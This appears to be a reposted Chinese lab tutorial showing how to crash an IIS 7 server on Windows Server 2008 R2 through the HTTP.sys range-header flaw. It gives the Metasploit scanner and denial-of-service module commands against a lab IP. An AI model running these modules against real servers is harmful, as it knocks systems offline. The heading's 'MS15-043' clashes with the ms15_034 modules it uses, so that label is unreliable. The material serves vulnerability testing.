http.sys_DDos攻击（ms15-043） - 走看看

zoukankan html css js c++ java

http.sys_DDos攻击（ms15-043）

远程执行代码漏洞存在于HTTP协议堆栈(HTTP.sys)中，当HTTP.sys未正确分析经特殊设计的HTTP请求时会导致该漏洞。该漏洞利用成功可使目标机器蓝屏。

微软官方说明：

https://docs.microsoft.com/zh-cn/security-updates/Securitybulletins/2015/ms15-043?redirectedfrom=MSDN

1、环境搭建

使用的是Windows server 2008 R2 x64里面自带的II7。

2、漏洞验证

该scanner与exp早已在msf中集成

加载漏洞验证模块

use auxiliary/scanner/http/ms15_034_http_sys_memory_dump

set rhosts 192.168.112.130

3、漏洞利用

加载漏洞利用模块

use auxiliary/dos/http/ms15_034_ulonglongadd

被攻击主机瞬间蓝屏。

查看全文

相关阅读:
Android之旅十六 android中各种资源的使用
 XTU OJ 1207 Welcome to XTCPC （字符串签到题）
scala并发编程原生线程Actor、Case Class下的消息传递和偏函数实战
 【云图】怎样设置支付宝里的家乐福全国连锁店地图？
怎样在QML中使用multitouch
软件project师周兆熊给IT学子的倾情奉献
 Linux系统下怎样配置SSH？怎样开启SSH？
数学之路-python计算实战(4)-Lempel-Ziv压缩(2)
Day5上午解题报告
 一份只有巨佬才能看懂的代码

原文地址：https://www.cnblogs.com/ahtoh/p/11698712.html

Copyright © 2011-2022 走看看